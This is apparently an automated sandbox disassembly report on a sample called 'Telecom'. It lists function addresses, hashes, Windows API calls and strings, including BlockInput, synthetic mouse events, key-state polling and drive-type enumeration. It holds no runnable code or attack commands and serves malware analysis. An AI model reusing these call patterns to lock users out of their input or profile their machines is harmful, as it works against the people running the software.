Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: deb722d0f879e925c981c544bb03cd128d48b9f0fdc71e9c9c433497fa734a8c
Instruction ID: bd3c65f87e5f3c22cc1ecee3502105b64d279c6da18a0f9dfb9b21d30dd1fb49
Opcode Fuzzy Hash: deb722d0f879e925c981c544bb03cd128d48b9f0fdc71e9c9c433497fa734a8c
Instruction Fuzzy Hash: D0B14C71210A089FD725CF28C48AB957BE1FF45364F26C659E89DCF2A1C339E992CB44

Uniqueness

Uniqueness Score: -1.00%

Function 0045C624 Relevance: 1.8, Strings: 1, Instructions: 511COMMON

Download Yara Rule

Strings

, xrefs: 00499908

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 2a88ebfba44e6851761a334ee12cbbcca57ee97ba72c3bd7a16424270ce3dbac
Instruction ID: c862ef95539707087e0a7eead402e77f4af4b2fe4f859e7d47da376c49d0ea23
Opcode Fuzzy Hash: 2a88ebfba44e6851761a334ee12cbbcca57ee97ba72c3bd7a16424270ce3dbac
Instruction Fuzzy Hash: C2127FB59002299FCF14DF58C880AEEB7B5EF48311F1481ABE849EB241D7389E85CF95

Uniqueness

Uniqueness Score: -1.00%

Function 004BF4FF Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 004BF51A

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: 523c0283d89b4cc9b0dc2036d5958c2e8103de9b43759204b006928fef58c317
Instruction ID: 3dd8d744936d89764fa34287d0e92678d1d791b2713376b79bb1d1e22af579cc
Opcode Fuzzy Hash: 523c0283d89b4cc9b0dc2036d5958c2e8103de9b43759204b006928fef58c317
Instruction Fuzzy Hash: AEE0D8312002006FD7109F6AD80098AF7D8AFA4364F04842BF849C7312C674F9408BA4

Uniqueness

Uniqueness Score: -1.00%

Function 004AEC6C Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 004AEC95

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: mouse_event
String ID:
API String ID: 2434400541-0
Opcode ID: ebc1348bde404ffa0e907e5ef23ecdb671a2657e2d2d1e4a341bc0589e81892f
Instruction ID: 8d2980567c557aabb50acb54afedc83650963d7d969c0fb8d79aec20cbcd37fe
Opcode Fuzzy Hash: ebc1348bde404ffa0e907e5ef23ecdb671a2657e2d2d1e4a341bc0589e81892f
Instruction Fuzzy Hash: F4D05EB619020079F81C0A3E9F2FF770A49E323761F80534FF122D5695E4C9A903912E

Uniqueness

Uniqueness Score: -1.00%

Function 00460D45 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00020D51,0046075E), ref: 00460D4A

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 257fed821a22e2f28e50cbf23f66f3acee4ef855035df3a94ef218143e58cb04
Instruction ID: 109c8599dcd869f5ab6d490e5cf219032cc25512b07aa728e3df6b34074986a6
Opcode Fuzzy Hash: 257fed821a22e2f28e50cbf23f66f3acee4ef855035df3a94ef218143e58cb04
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 004B2A05 Relevance: 1.3, Strings: 1, Instructions: 72COMMON

Download Yara Rule

Strings

P6Q, xrefs: 004B2A12

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID:
String ID: P6Q
API String ID: 0-109905845
Opcode ID: e5cbd2fa602a7b22bf496b65c50125da3f2b58952adaf06cc6bc04590f9fb694
Instruction ID: b5d8c32d39a47d130d20e0f3a6f1dbc41028a19c6b272049b3da4fbe0a9449e7
Opcode Fuzzy Hash: e5cbd2fa602a7b22bf496b65c50125da3f2b58952adaf06cc6bc04590f9fb694
Instruction Fuzzy Hash: D421E7727205108BD728CF7AC8236BA73E5A764310F158A2EE4A7C77D0DE79E9049B54

Uniqueness

Uniqueness Score: -1.00%

Function 00449240 Relevance: .8, Instructions: 827COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a53ddbbd0739621c9d7741ecebf8f5a78c8e7f675b8a1e1ec1753c02a8b88121
Instruction ID: 498fd57ed985c8ce05c649c8a564aa5be2fe12e07293054756195f5c1dd57139
Opcode Fuzzy Hash: a53ddbbd0739621c9d7741ecebf8f5a78c8e7f675b8a1e1ec1753c02a8b88121
Instruction Fuzzy Hash: 8162F2B1A00205DFEF04DF64C881AAEB7B5FF05304F15456AE806AB391EB39DD42DB99

Uniqueness

Uniqueness Score: -1.00%

Function 00477159 Relevance: .6, Instructions: 637COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2bac5d1e55a0877e78a97de9f2f3e47a44df485b584605dc8d688d3c9a48ba5
Instruction ID: b8dd66052357a99317d55b5611188f4900081cf5213b16fe6450bcafc3e67296
Opcode Fuzzy Hash: c2bac5d1e55a0877e78a97de9f2f3e47a44df485b584605dc8d688d3c9a48ba5
Instruction Fuzzy Hash: DD327721D29F414DD7239A38CC66336A248AFB73C5F55D737E819B9EA6EB28C5834104

Uniqueness

Uniqueness Score: -1.00%

Function 0045E144 Relevance: .6, Instructions: 635COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef21ac4b3cc8c8e851363acc183d99def883b89964b521a69c56a17c50813fca
Instruction ID: b62f8734585f22c1ed42370310c5fc248bb83b06a10a059bd0ba8f1090386090
Opcode Fuzzy Hash: ef21ac4b3cc8c8e851363acc183d99def883b89964b521a69c56a17c50813fca
Instruction Fuzzy Hash: 45321731E005168FDF28CF2AC49467E7BA1AB46301F29857BD846CB396D23CDD86CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0047A26E Relevance: .3, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0160a004e0a4ff47f974c18dbd74879c5799c2c2a7f0255e3b7d3b6d552e64d5
Instruction ID: 9757a2d72f78010cba733e9dcc6dcac474e24e471918a530803db9edde29ee8a
Opcode Fuzzy Hash: 0160a004e0a4ff47f974c18dbd74879c5799c2c2a7f0255e3b7d3b6d552e64d5
Instruction Fuzzy Hash: A4B1E020E2AF814DD22396399871336B75CAFFB2D5F52D72BFC2678D62EB2185834144

Uniqueness

Uniqueness Score: -1.00%

Function 004622A2 Relevance: .2, Instructions: 244COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
Instruction ID: 01271c536d528ba5439a94c37f5eedcae1bce92de7e741420410327d2933f561
Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
Instruction Fuzzy Hash: 7591A5721094A31ADB29823D863403FFFE15A523A131A079FD8F2CB2C5FE5CC554E625

Uniqueness

Uniqueness Score: -1.00%

Function 00468017 Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d60258dec321d04381de5cc7dcacf7d06bad2cbc58ebb1dbe5c2253c1ca63bc
Instruction ID: 743df14961fc680a9cb4867d4a3cc8da65955f687ee09f06f7f05b8c7c3280ed
Opcode Fuzzy Hash: 4d60258dec321d04381de5cc7dcacf7d06bad2cbc58ebb1dbe5c2253c1ca63bc
Instruction Fuzzy Hash: 0561267120070866DF345A6888A57FF33989B42744F154B1FEA82EB391FE1D9D8B825F

Uniqueness

Uniqueness Score: -1.00%

Function 004C353B Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 486filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 004C358D
DeleteObject.GDI32(00000000), ref: 004C35A0
DestroyWindow.USER32 ref: 004C35AF
GetDesktopWindow.USER32 ref: 004C35CA
GetWindowRect.USER32(00000000), ref: 004C35D1
SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 004C3700
AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 004C370E
CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 004C3755
GetClientRect.USER32(00000000,?), ref: 004C3761
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 004C379D
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 004C37BF
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 004C37D2
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 004C37DD
GlobalLock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 004C37E6
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 004C37F5
GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 004C37FE
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 004C3805
GlobalFree.KERNEL32(00000000), ref: 004C3810
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 004C3822
OleLoadPicture.OLEAUT32(?,00000000,00000000,004E0C04,00000000), ref: 004C3838
GlobalFree.KERNEL32(00000000), ref: 004C3848
CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 004C386E
SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 004C388D
SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 004C38AF
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 004C3A9C

Strings

, xrefs: 004C3A22
AutoIt v3, xrefs: 004C374F
DISPLAY, xrefs: 004C38FF
static, xrefs: 004C3797, 004C38EE

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: 60a6774e02135d462cf7b874b5f9850e3d6c4a92f7d6496b75ce7d59b982f500
Instruction ID: 894e50b519ae1bad3504c399efa7d445e52cfc516810221b5f773234b1994bef
Opcode Fuzzy Hash: 60a6774e02135d462cf7b874b5f9850e3d6c4a92f7d6496b75ce7d59b982f500
Instruction Fuzzy Hash: 6102AF75A00205AFDB14DF64CC89EAE7BB9EB48311F04815EF9159B2A0CB78ED01CF68

Uniqueness

Uniqueness Score: -1.00%

Function 004C316E Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 004C319B
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004C32C7
SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 004C3306
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 004C3316
CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 004C335D
GetClientRect.USER32(00000000,?), ref: 004C3369
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 004C33B2
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004C33C1
GetStockObject.GDI32(00000011), ref: 004C33D1
SelectObject.GDI32(00000000,00000000), ref: 004C33D5
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 004C33E5
GetDeviceCaps.GDI32(00000000,0000005A), ref: 004C33EE
DeleteDC.GDI32(00000000), ref: 004C33F7
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004C3423
SendMessageW.USER32(00000030,00000000,00000001), ref: 004C343A
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 004C347A
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 004C348E
SendMessageW.USER32(00000404,00000001,00000000), ref: 004C349F
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 004C34D4
GetStockObject.GDI32(00000011), ref: 004C34DF
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 004C34EA
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 004C34F4

Strings

AutoIt v3, xrefs: 004C3355
DISPLAY, xrefs: 004C33B7
static, xrefs: 004C33AC, 004C34CE
msctls_progress32, xrefs: 004C3470

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: 26dcb5483f2027b661379ed952fb0b0e97c926f34fe90a894054400363fe3ea7
Instruction ID: 03cbfa8bb904a39d0c1815e452b7e1c7454e6828565f6aab3a5af703e1d28cb6
Opcode Fuzzy Hash: 26dcb5483f2027b661379ed952fb0b0e97c926f34fe90a894054400363fe3ea7
Instruction Fuzzy Hash: F5B16F75A00215AFEB14DFA8CC45FAE7BB9EB08715F10855AF915E7290C778ED00CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 004B5524 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 004B5532
GetDriveTypeW.KERNEL32(?,004DDC30,?,\\.\,004DDCD0), ref: 004B560F
SetErrorMode.KERNEL32(00000000,004DDC30,?,\\.\,004DDCD0), ref: 004B577B

Strings

RAID, xrefs: 004B5700
Network, xrefs: 004B5647
Virtual, xrefs: 004B572A
SSA, xrefs: 004B56EB
1394, xrefs: 004B56E4
ATAPI, xrefs: 004B56D6
SCSI, xrefs: 004B56CF
Removable, xrefs: 004B5655, 004B565A
iSCSI, xrefs: 004B5707
Unknown, xrefs: 004B5632, 004B56C8
FileBackedVirtual, xrefs: 004B5731
PhysicalDrive, xrefs: 004B55BB
\\.\, xrefs: 004B5584
RAMDisk, xrefs: 004B5639
Fibre, xrefs: 004B56F2
Fixed, xrefs: 004B564E
USB, xrefs: 004B56F9
SSD, xrefs: 004B568F
MMC, xrefs: 004B5723
ATA, xrefs: 004B56DD
SATA, xrefs: 004B5715
CDROM, xrefs: 004B5640
SAS, xrefs: 004B570E

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: 6ac0b41cc56f07a6a0ceef50d15b9faa35f7913a4b3c5fffe5df4a08e7082f3f
Instruction ID: fc7443ca9d9ab2076506656cd6ea7c47e42f671b46b5b35608c9394763fe7a36
Opcode Fuzzy Hash: 6ac0b41cc56f07a6a0ceef50d15b9faa35f7913a4b3c5fffe5df4a08e7082f3f
Instruction Fuzzy Hash: 1461A431B44909DBC724DF24C991AFDF7A1FF18354F24406BE40A9B291DA29AD03DB6A

Uniqueness

Uniqueness Score: -1.00%

Function 00442521 Relevance: 42.3, APIs: 18, Strings: 6, Instructions: 282windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 004425F8
GetSystemMetrics.USER32(00000007), ref: 00442600
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0044262B
GetSystemMetrics.USER32(00000008), ref: 00442633
GetSystemMetrics.USER32(00000004), ref: 00442658
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00442675
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00442685
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 004426B8
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 004426CC
GetClientRect.USER32(00000000,000000FF), ref: 004426EA
GetStockObject.GDI32(00000011), ref: 00442706
SendMessageW.USER32(00000000,00000030,00000000), ref: 00442711

Part of subcall function 004419CD: GetCursorPos.USER32(?), ref: 004419E1
Part of subcall function 004419CD: ScreenToClient.USER32(00000000,?), ref: 004419FE
Part of subcall function 004419CD: GetAsyncKeyState.USER32(00000001), ref: 00441A23
Part of subcall function 004419CD: GetAsyncKeyState.USER32(00000002), ref: 00441A3D

SetTimer.USER32(00000000,00000000,00000028,0044199C), ref: 00442738

Strings

(Q, xrefs: 00483909
AutoIt v3 GUI, xrefs: 004426B0
(Q, xrefs: 0044271A
<)Q, xrefs: 0044255C
<)Q, xrefs: 004839A6
(Q, xrefs: 00442749

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: <)Q$<)Q$AutoIt v3 GUI$(Q$(Q$(Q
API String ID: 1458621304-1599819014
Opcode ID: 20ffd11f093b17b064bea0cb2bb8f5f6fd4be748edcad502f5b05205b77b8e13
Instruction ID: c045f89548d186ad465a54a3b645928be6624922575061184b822e99ccb8a35e
Opcode Fuzzy Hash: 20ffd11f093b17b064bea0cb2bb8f5f6fd4be748edcad502f5b05205b77b8e13
Instruction Fuzzy Hash: 3BB1AE71A00209AFDB14EFA8DD45BEE3BB4FB48715F10412AFA05A7290D7B8E941CF59

Uniqueness

Uniqueness Score: -1.00%

Function 004D0CDD Relevance: 35.4, APIs: 7, Strings: 13, Instructions: 391windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 004D0D81
_wcslen.LIBCMT ref: 004D0DBB
_wcslen.LIBCMT ref: 004D0E25
_wcslen.LIBCMT ref: 004D0E8D
_wcslen.LIBCMT ref: 004D0F11
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 004D0F61
